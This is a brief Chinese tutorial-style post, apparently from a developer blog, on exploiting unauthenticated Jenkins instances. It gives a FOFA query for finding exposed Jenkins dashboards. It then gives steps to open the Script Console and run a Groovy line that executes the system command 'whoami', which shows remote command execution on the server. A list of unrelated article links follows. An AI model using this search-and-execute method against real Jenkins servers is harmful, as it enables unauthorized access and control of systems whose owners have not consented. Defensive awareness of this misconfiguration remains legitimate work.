Jenkins未授权访问漏洞

5.Jenkins未授权访问漏洞

默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。

一、使用以下fofa语法进行产品搜索
复制代码
port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"
二:在打开的URL中.点击 Manage Jenkins-->Scritp Console 在执行以下命令

println "whoami".execute().text

相关推荐
沸点小助手几秒前
「妈,我真不是修电脑的」获奖名单公示|本周互动话题上新🎊
前端·人工智能
兵麒麟14 分钟前
JavaScript Promise 完全掌握:从外卖订单到优雅异步
前端
转转技术团队15 分钟前
不写一行代码,用 Xmind 思维导图跑通多端自动化回归
前端
铁皮饭盒18 分钟前
同样是算力巨头,为什么华为死磕英伟达,AMD 却 "躺平看戏"?
前端·后端
文心快码BaiduComate19 分钟前
用Comate 7天完成”鹅鸭杀”游戏网站开发
前端·后端·程序员
2401_8654396322 分钟前
CSS中隐藏元素的多重技巧与应用场景
开发语言·前端·javascript
灰子学技术34 分钟前
Envoy CSRF 保护过滤器实现分析
前端·csrf
Strayer38 分钟前
工艺图图在线编辑器
前端·canvas
zhangxingchao39 分钟前
AI应用开发二:Embedding与向量数据库
前端·人工智能·后端
Momo__1 小时前
Vue3 v-memo:长列表渲染的性能核武器
前端·vue.js